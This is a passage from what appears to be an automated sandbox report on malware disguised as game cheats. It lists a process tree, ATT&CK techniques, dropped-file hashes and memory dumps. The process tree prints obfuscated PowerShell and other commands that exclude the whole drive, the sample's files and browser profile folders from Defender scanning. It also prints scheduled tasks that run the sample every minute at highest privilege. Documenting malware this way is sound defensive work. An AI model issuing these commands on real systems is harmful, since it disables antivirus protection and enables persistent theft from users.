        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdABzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAbQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByACAAbgBvAHQAIAB3AG8AcgBrAGkAbgBnACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB6AHkAdAAjAD4A"
        9⤵
        
        PID:2312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAeQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBmACMAPgA="
        9⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Latite Client_BetterV3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Latite Client_BetterV3.exe"
        9⤵
        
        PID:3260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Latite Client_BetterV3.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite Client_BetterV3.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2956
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite Client_BetterV3" /tr "C:\ProgramData\Latite Client_BetterV3.exe"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Latite Client_BetterV3.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsDefender'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3956
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\ProgramData\WindowsDefender"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:972
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "WindowsDefender"
        10⤵
        
        PID:5012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3AAE.tmp.bat""
        10⤵
        
        PID:2600
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        11⤵
        Delays execution with timeout.exe
        
        PID:2472
        
        C:\Windows\coolhi.exe
        
        "C:\Windows\coolhi.exe"
        8⤵
        
        PID:452
        
        C:\Windows\coolhi.exe
        
        "C:\Windows\coolhi.exe"
        9⤵
        
        PID:4396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'"
        10⤵
        
        PID:3500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'"
        10⤵
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:60
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:3116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f8d49a4af7a844bfc7247d5670def557

SHA1
26ae0ce194a77a7a1887cf93741293fdfa6c94c4

SHA256
61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

SHA512
9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d2c8d8bf93f9450f044c6ef5dff215a

SHA1
4d6ecc646ee6c124aaf7535c1387445e02734750

SHA256
e77daf5c774ba87a166ccd95c40a7211f605316321e1d421b82fb0fc8ed75eb0

SHA512
c75903513f87ba5fb4da3e19b079be8ba1f451e1f503ed9fdcf3dee82ce9605b87af560a120156a09b3842cdf0c42fb20f7c8cd242e3021d644e959c8536c0aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee6f5f5e5924783870aeedeccdafe9da

SHA1
0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

SHA256
ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

SHA512
998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll Cheat.exe

Filesize
5.3MB

MD5
71fd71baa11a5bf59ebb074c1f133047

SHA1
c7a597153b47e7062f74a8351662c3120732792a

SHA256
1ba38156fe338ffdae7f6137824a6555b8029b2ef0dba64e2bfbae0e6b270a86

SHA512
de646b086ec87973c1229175a24b4bf76638ff74ca258fe49d1edea5fcc6659712b6c58563f0d379b33eae98e2aff3c7dcf6b261ac9ce9be489c1e1ff43cf9d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Image logger V2.bat

Filesize
29.9MB

MD5
f9fe001633e62b59eec398eaeb5d9b3c

SHA1
edc9879fab5c9e69eca9814584a3079e93a4339d

SHA256
2d17ba79048d0a46969907a6120505f4608f9a252af3a5a21bb875c08aaee2ef

SHA512
0bebd885894e67d2490c55f9d07f7bdaf2e1c5aea1632739fb41b7a05fb6e2a997948dd22f6d1e5b4b1233a40d76ae326acd8d0ad1d54b0ae7c0d55be4da8a20

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Latite Client_BetterV3.exe

Filesize
143KB

MD5
a677d044cc4d2fe27653f8f285996134

SHA1
30c586c84ee5b9299450b5871ec7186dee562777

SHA256
960d607391f69a4213108dfd0beb8acd0278e6dbefd74dbcb70cac38fc1bde58

SHA512
ec75aa4f63a6989493641bf3aef6869856896e9accd7508a0eb155f8b8e7d790c5b3a444f99214f4044fa7a2c5334515142fe06818abe8712faa49308fb66a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV1.bat

Filesize
1.7MB

MD5
8ab2176d17600593d71e5763be582739

SHA1
ee0105e502c14645cd3321a23ad8a63d25ff7aab

SHA256
3d63dc5897b50c7c3b90b5679885c734f7d80aa3a7d3104279efb6cb9673df7e

SHA512
4c8266c03550a274b7c637fa12beab6be4460f0b4999a40a9d077f33a0e60a15321ab4748b66d972e26b735ae4a79ab6bdb60307e39b1a51f45ffd8adffba106

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV1.exe

Filesize
206KB

MD5
c669b7aac0c6d6e5a2b09fa060835720

SHA1
cff60e01094fa203715b76820c1b37a680381108

SHA256
abf05fddbb728e0cf67da50245a63c28b383c3d50573b3c96cd15032d0af38f5

SHA512
d4ecafc845ed6430bb802c18811dd79227e568e9feef12dbba73ee983b98b1c87002c3e62ab5c39278dedf4da23ce16ba007dd970a564a6d87acaf1e692f803a

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV5.exe

Filesize
10.6MB

MD5
e490f79ba1a743286fe3f0374fe59f9b

SHA1
86d97c7eb8c830cb9b82d28f3dce4ad13b40176e

SHA256
2992f68726b6d5ea330c2e401377cf9e038913c7fae23b99e1c0c1f13f8367ad

SHA512
dd7ec65de355c7c8bf12165d0b4e35f286913d4fa880a331f92f35a34b84558e580fb4cd3b418271b23e5ce12465f4441f84e6a483e6686814dad1b88a3d7ac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\VCRUNTIME140.dll

Filesize
94KB

MD5
11d9ac94e8cb17bd23dea89f8e757f18

SHA1
d4fb80a512486821ad320c4fd67abcae63005158

SHA256
e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

SHA512
aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_bz2.pyd

Filesize
78KB

MD5
b45e82a398713163216984f2feba88f6

SHA1
eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839

SHA256
4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8

SHA512
b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_ctypes.pyd

Filesize
117KB

MD5
79f339753dc8954b8eb45fe70910937e

SHA1
3ad1bf9872dc779f32795988eb85c81fe47b3dd4

SHA256
35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007

SHA512
21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_decimal.pyd

Filesize
241KB

MD5
1cdd7239fc63b7c8a2e2bc0a08d9ea76

SHA1
85ef6f43ba1343b30a223c48442a8b4f5254d5b0

SHA256
384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690

SHA512
ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_hashlib.pyd

Filesize
57KB

MD5
cfb9e0a73a6c9d6d35c2594e52e15234

SHA1
b86042c96f2ce6d8a239b7d426f298a23df8b3b9

SHA256
50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6

SHA512
22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_lzma.pyd

Filesize
149KB

MD5
5a77a1e70e054431236adb9e46f40582

SHA1
be4a8d1618d3ad11cfdb6a366625b37c27f4611a

SHA256
f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e

SHA512
3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_socket.pyd

Filesize
72KB

MD5
5dd51579fa9b6a06336854889562bec0

SHA1
99c0ed0a15ed450279b01d95b75c162628c9be1d

SHA256
3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c

SHA512
7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\base_library.zip

Filesize
858KB

MD5
0eb61f9b08b022e88d61efc7875930d6

SHA1
f2791f356dcae681196c37d1e6a523340adcf638

SHA256
0ff0c5dd453b4f0590a9d94aa6b9ca28e429cc78fc6afca0a415bb4fc06b8ea0

SHA512
b793e4d23cf5be9da6ed5f1ed88d46d4b9b1e8b5e6966e8705a633d183a75cea82aa5d94d43860fafbd02ede9d4d652e62b379d0a6239c2ef5a4f130bb71fe05

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\libcrypto-1_1.dll

Filesize
3.3MB

MD5
63c4f445b6998e63a1414f5765c18217

SHA1
8c1ac1b4290b122e62f706f7434517077974f40e

SHA256
664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2

SHA512
aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\select.pyd

Filesize
25KB

MD5
78d421a4e6b06b5561c45b9a5c6f86b1

SHA1
c70747d3f2d26a92a0fe0b353f1d1d01693929ac

SHA256
f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823

SHA512
83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\unicodedata.pyd

Filesize
1.1MB

MD5
a40ff441b1b612b3b9f30f28fa3c680d

SHA1
42a309992bdbb68004e2b6b60b450e964276a8fc

SHA256
9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08

SHA512
5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4522\VCRUNTIME140_1.dll

Filesize
36KB

MD5
7667b0883de4667ec87c3b75bed84d84

SHA1
e6f6df83e813ed8252614a46a5892c4856df1f58

SHA256
04e7ccbdcad7cbaf0ed28692fb08eab832c38aad9071749037ee7a58f45e9d7d

SHA512
968cbaafe416a9e398c5bfd8c5825fa813462ae207d17072c035f916742517edc42349a72ab6795199d34ccece259d5f2f63587cfaeb0026c0667632b05c5c74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4522\_cffi_backend.cp310-win_amd64.pyd

Filesize
174KB

MD5
12d1fece05057f946654f475c4562a5c

SHA1
539534b9d419815a5dad73603437ecb5afebc0dc

SHA256
1ae3faac65748b494409b4dc6919752ecb444a5136865e5826076be71efd5d85

SHA512
124207d1c35a500f268904d1c4c860ee534cc129cd3cd4a1ffac70a58aa518055a2e7d415622531fcdf834f4d676144a0de729a2d832772e3626e835f5cf2978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4522\base_library.zip

Filesize
858KB

MD5
1ebb920a2696a11237f3e8e4af10d802

SHA1
f86a052e2dfa2df8884ebf80832814f920a820e6

SHA256
d0e26325e67b3db749a83698413c4c270d8b26cd7dbc607006bc526ee784d6df

SHA512
2cfa6746dcdf575f26267b359a8820a6f29d81967c62131463802b30db2e17c8f159a2cbc652f25bdfdfd7c5942d26a26f9e1df984f8560696153a3427e4fb47

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4522\libssl-1_1.dll

Filesize
678KB

MD5
bd857f444ebbf147a8fcd1215efe79fc

SHA1
1550e0d241c27f41c63f197b1bd669591a20c15b

SHA256
b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf

SHA512
2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4522\python3.DLL

Filesize
60KB

MD5
a5471f05fd616b0f8e582211ea470a15

SHA1
cb5f8bf048dc4fc58f80bdfd2e04570dbef4730e

SHA256
8d5e09791b8b251676e16bdd66a7118d88b10b66ad80a87d5897fadbefb91790

SHA512
e87d06778201615b129dcf4e8b4059399128276eb87102b5c3a64b6e92714f6b0d5bde5df4413cc1b66d33a77d7a3912eaa1035f73565dbfd62280d09d46abff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4522\sqlite3.dll

Filesize
1.4MB

MD5
7bb1d577405f1129faf3ea0225c9d083

SHA1
60472de4b1c7a12468d79994d6d0d684c91091ef

SHA256
831ba87cb1a91d4581f0abbcc4966c6f4b332536f70cf481f609c44cc3d987c2

SHA512
33b1fd3a289193bff168c967caebc0131732bd04562a770cf2edac602ab6d958f7bde7a0e57bb125a7598852bdac30f96d0db46cb4a2460a61a0d914b011ed20

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ckbygvnn.zsl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_515.vbs

Filesize
115B

MD5
10e96ffff822a6753d52487a3db6f977

SHA1
0f6dcd7c5e1045d248881a8a934f1d6501cb38fd

SHA256
aaf166de97f3e39399fe869bddb34a74e340e68aaed38bd46bc9a5bf3cd060ff

SHA512
35cfc54c88b7e800216f5ec6238896f44f041ec72ab0cee4b1d53f8946a4219eb157c03c3c1eaf1273ab94a14829d7112b431386033f2c6088d54f7569ee5531

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_870.vbs

Filesize
115B

MD5
9cb90739460b80e64718dadec7b56d80

SHA1
6edd1d3aa52b7eb21296141146502bd55c76808b

SHA256
14e8a4ca0c697198f31ae35342adad0c3c90bfe669ad1a1d6f351f1e3b99794e

SHA512
10b64917d3b0c36490be26554f6d5890469b53cb5f945794cb2e853da966a3e6212798d3ee63c4287866a57110fd27bdf2429c470cb5861cada934e704c70c6f

Download Submit
C:\Windows\Latite_Client_betterV1.exe

Filesize
196KB

MD5
ce0b8f899eaf246c39df74a3d6469c15

SHA1
5806a235161b97ff98b8d3788583700480b763be

SHA256
91fae5a53a72146265efb73813d170e6c261f3154e4b1d97e969169ea8b55669

SHA512
a652172836902b8b025bfd836787706d0ea8e6bb3f2385b54687e2ada84c9ed13f7c7ef9afa784c3c4d9a91ad2330be03cbaccabf20c8fb481a36758420740d4

Download Submit
C:\Windows\coolhi.exe

Filesize
10.4MB

MD5
d6f404cfbad09c7aa09036d54a03559a

SHA1
4a746e1223219eda0ede43ce5aee108ea4f28b28

SHA256
5495250d78bea6bfce37ae281670d3edcb218bc749d1c34b3508c273f42c54d5

SHA512
6e5971102b2c453e79d390978cb23cef186b442dad09e31b5e87c313feaa0cbc2c3ea0debffa8392dc409a041e71183878149b815e769f26b25d6cc1942c9b7f

Download Submit
memory/412-17-0x00007FF9FB270000-0x00007FF9FBD31000-memory.dmp

Filesize
10.8MB

Download
memory/412-3-0x00007FF9FB273000-0x00007FF9FB275000-memory.dmp

Filesize
8KB

Download
memory/412-9-0x000001EDC2CA0000-0x000001EDC2CC2000-memory.dmp

Filesize
136KB

Download
memory/412-14-0x00007FF9FB270000-0x00007FF9FBD31000-memory.dmp

Filesize
10.8MB

Download
memory/412-15-0x00007FF9FB270000-0x00007FF9FBD31000-memory.dmp

Filesize
10.8MB

Download
memory/412-51-0x00007FF9FB270000-0x00007FF9FBD31000-memory.dmp

Filesize
10.8MB

Download
memory/412-16-0x00007FF9FB273000-0x00007FF9FB275000-memory.dmp

Filesize
8KB

Download
memory/412-20-0x000001EDC3D90000-0x000001EDC5498000-memory.dmp

Filesize
23.0MB

Download
memory/412-19-0x000001EDA8530000-0x000001EDA8538000-memory.dmp

Filesize
32KB

Download
memory/412-18-0x00007FF9FB270000-0x00007FF9FBD31000-memory.dmp

Filesize
10.8MB

Download
memory/1140-357-0x0000000005F40000-0x0000000006294000-memory.dmp

Filesize
3.3MB

Download
memory/1140-398-0x0000000006910000-0x000000000692A000-memory.dmp

Filesize
104KB

Download
memory/1140-372-0x0000000006700000-0x000000000674C000-memory.dmp

Filesize
304KB

Download
memory/1140-371-0x0000000006400000-0x000000000641E000-memory.dmp

Filesize
120KB

Download
memory/1140-397-0x0000000007C40000-0x00000000082BA000-memory.dmp

Filesize
6.5MB

Download
memory/1140-410-0x0000000008870000-0x0000000008E14000-memory.dmp

Filesize
5.6MB

Download
memory/1140-337-0x0000000005070000-0x00000000050A6000-memory.dmp

Filesize
216KB

Download
memory/1140-420-0x00000000077D0000-0x0000000007862000-memory.dmp

Filesize
584KB

Download
memory/3260-463-0x000000001B900000-0x000000001B91E000-memory.dmp

Filesize
120KB

Download
memory/3260-400-0x0000000000CD0000-0x0000000000CF8000-memory.dmp

Filesize
160KB

Download
memory/3616-122-0x000001834B2B0000-0x000001834B2B8000-memory.dmp

Filesize
32KB

Download
memory/3616-123-0x000001834B530000-0x000001834B67A000-memory.dmp

Filesize
1.3MB

Download
memory/4156-89-0x0000000000CE0000-0x000000000177C000-memory.dmp

Filesize
10.6MB

Download
memory/4156-176-0x000000001D3B0000-0x000000001DE46000-memory.dmp

Filesize
10.6MB

Download
memory/4392-304-0x000001D284B50000-0x000001D285B50000-memory.dmp

Filesize
16.0MB

Download
memory/4556-342-0x0000000005C30000-0x0000000005C96000-memory.dmp

Filesize
408KB

Download
memory/4556-421-0x0000000007C80000-0x0000000007C8A000-memory.dmp

Filesize
40KB

Download
memory/4556-399-0x0000000007AD0000-0x0000000007B73000-memory.dmp

Filesize
652KB

Download
memory/4556-428-0x0000000007F20000-0x0000000007F28000-memory.dmp

Filesize
32KB

Download
memory/4556-396-0x0000000007AA0000-0x0000000007ABE000-memory.dmp

Filesize
120KB

Download
memory/4556-386-0x0000000070D10000-0x0000000070D5C000-memory.dmp

Filesize
304KB

Download
memory/4556-340-0x0000000005B20000-0x0000000005B42000-memory.dmp

Filesize
136KB

Download
memory/4556-427-0x0000000007F40000-0x0000000007F5A000-memory.dmp

Filesize
104KB

Download
memory/4556-341-0x0000000005BC0000-0x0000000005C26000-memory.dmp

Filesize
408KB

Download
memory/4556-385-0x0000000007A60000-0x0000000007A92000-memory.dmp

Filesize
200KB

Download
memory/4556-338-0x0000000005CC0000-0x00000000062E8000-memory.dmp

Filesize
6.2MB

Download
memory/4556-422-0x0000000007E80000-0x0000000007F16000-memory.dmp

Filesize
600KB

Download
memory/4556-423-0x0000000007E00000-0x0000000007E11000-memory.dmp

Filesize
68KB

Download
memory/4556-425-0x0000000007E40000-0x0000000007E4E000-memory.dmp

Filesize
56KB

Download
memory/4556-426-0x0000000007E50000-0x0000000007E64000-memory.dmp

Filesize
80KB

Download
memory/4628-58-0x000001FCEBE60000-0x000001FCECE60000-memory.dmp

Filesize
16.0MB

Download
memory/4868-189-0x0000000000C50000-0x0000000000C88000-memory.dmp

Filesize
224KB

Download
memory/4868-375-0x0000000002D40000-0x0000000002D70000-memory.dmp

Filesize
192KB

Download